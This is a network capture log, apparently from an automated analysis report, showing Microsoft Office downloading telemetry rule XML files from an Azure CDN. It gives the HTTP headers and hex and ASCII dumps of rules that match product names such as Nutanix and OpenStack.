                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:24 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:24 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                x-ms-request-id: 1e280d2f-401e-0029-0d7f-3b9b43000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155424Z-174c587ffdf9xbcchC1TEBxkz4000000032g000000003hqd
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                70192.168.2.44990213.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:24 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:24 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                x-ms-request-id: ba3f3383-a01e-000d-6e55-3cd1ea000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155424Z-15b8b599d889fz52hC1TEB59as000000035g000000005yy4
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:24 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                71192.168.2.44990313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:24 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:24 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                x-ms-request-id: ea05e59b-301e-0033-4bf7-3cfa9c000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155424Z-178bfbc474bnwsh4hC1NYC2ubs00000004sg000000007m5r
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:25 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                72192.168.2.44990613.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:26 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:26 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 470
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                x-ms-request-id: 43d09947-101e-005a-2421-3c882b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155426Z-178bfbc474bnwsh4hC1NYC2ubs00000004ug00000000330z
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:27 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                73192.168.2.44990713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:26 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:26 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                x-ms-request-id: c14060eb-d01e-007a-6e7d-3bf38c000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155426Z-174c587ffdf8fcgwhC1TEBnn70000000038000000000gzke
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:27 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                74192.168.2.44990413.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:26 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:26 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 485
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                x-ms-request-id: cf2b2526-c01e-0082-5660-3baf72000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155426Z-178bfbc474bpnd5vhC1NYC4vr400000004qg0000000077sf
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:27 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                75192.168.2.44990513.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:26 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:26 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 411
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155426Z-174c587ffdfn4nhwhC1TEB2nbc000000033000000000rztc
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:27 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                76192.168.2.44990813.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:26 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:27 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 502
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155427Z-174c587ffdfb485jhC1TEBmc1s0000000310000000005keu
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:27 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                77192.168.2.44991013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:28 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:29 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 474
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                x-ms-request-id: c9d02f83-e01e-0033-4d75-3b4695000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155429Z-174c587ffdfx984chC1TEB676g000000034000000000ch27
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:29 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                78192.168.2.44991113.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:28 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:29 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 408
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                                x-ms-request-id: 606a4207-501e-005b-157e-3bd7f7000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155429Z-174c587ffdfgcs66hC1TEB69cs000000032g000000003npt
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
